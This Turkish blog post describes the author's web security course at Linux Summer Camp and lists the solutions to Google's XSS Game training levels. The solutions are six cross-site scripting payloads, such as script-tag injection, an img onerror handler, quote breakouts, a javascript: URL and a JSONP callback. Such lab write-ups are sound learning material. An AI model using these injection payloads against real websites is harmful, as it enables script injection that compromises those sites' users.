Google XSS Oyunu ve Cevapları

Bu sene Linux Yaz Kampında  Web Uygulama Güvenliği ve Güvenli Kod Geliştirme kursuna katılma şansı yakaladım.Teoride  bildiğim bir çok şeyi uygulama,deneme fırsatı yakaladım.Bunun dışında bir çok yeni bilgil öğrendim.İmkanı olan bilgisayar ve bilişim ile ilgili bölüm okuyan,ilgi duyan herkesin bir kere Linux Yaz Kampına katılıp eğitim alması gerektiğine inanmaktayım.15 Gün boyunca sabah 9,30 akşam 9,30 eğitici ve eğlenceli bir ortam sunmakta.Bu seneki kursu veren hocalarıma Mehmet Dursun Ince,Barkın Kılıç,Ayşe Bilge Gündüz ve misafir eğitmenimiz Ozan Uçar‘a ve kursun bir diğer misafir eğitmeni Ömer Çıtak’a teşekkür ederim.

Şimdi gelelim asıl konumuza :) Tabiki Google’ın XSS oyunu ve Cevapları kamp esnasında XSS anlatıldıktan sonra çözmemiz istendi.Bende Soruları geçerken ki yazdığım payloadları blogumdan paylaşmak istedim :) Tabi hepsini kendim çözmedim.Soruları araştırıp çoğu konuyu beraber öğrendiğimiz sevgili ev arkadaşım,en yakın arkadaşlarımdan Onur Gürbüz‘e de teşekkür ederim :)

Google XSS Oyunu,6 soruluk ve her soruda farklı bir XSS Zaafiyetini ele alan bir sistem. https://xss-game.appspot.com/  adresine giderek hemen çözmeye başlayabilirsiniz.

Soru 1 

[php]<script>alert(1)</script>  [/php]

 

Soru 2

[php]<img src="" onerror=alert(1)>[/php]

 

 

Soru 3

[php] ’)"><script>alert(1);</script> [/php]

 

Soru 4

[php]  ’); alert(1) // [/php]

 

Soru 5

[php] javascript:alert(1) [/php]

 

Soru 6

[php] //www.google.com/jsapi?callback=alert [/php]

 

 

Success!!

Son Yazılar

• 13 Jan 2017 » Wordpress Blogu Jekyll Taşıma
• 12 Jan 2017 » Shellter ile Backdoor Hazırlama ve Sisteme Sızma
• 26 Oct 2016 » Kevgir VM Sızma Testi ve Yetki Yükseltme Aşamaları
• 25 Oct 2016 » XSS(Cross Site Scripting) Nedir? ve XSS Lab Uygulaması (Web for Pentester)
• 25 Oct 2016 » Man in the Middle Attack (Ortadaki Adam Saldırısı)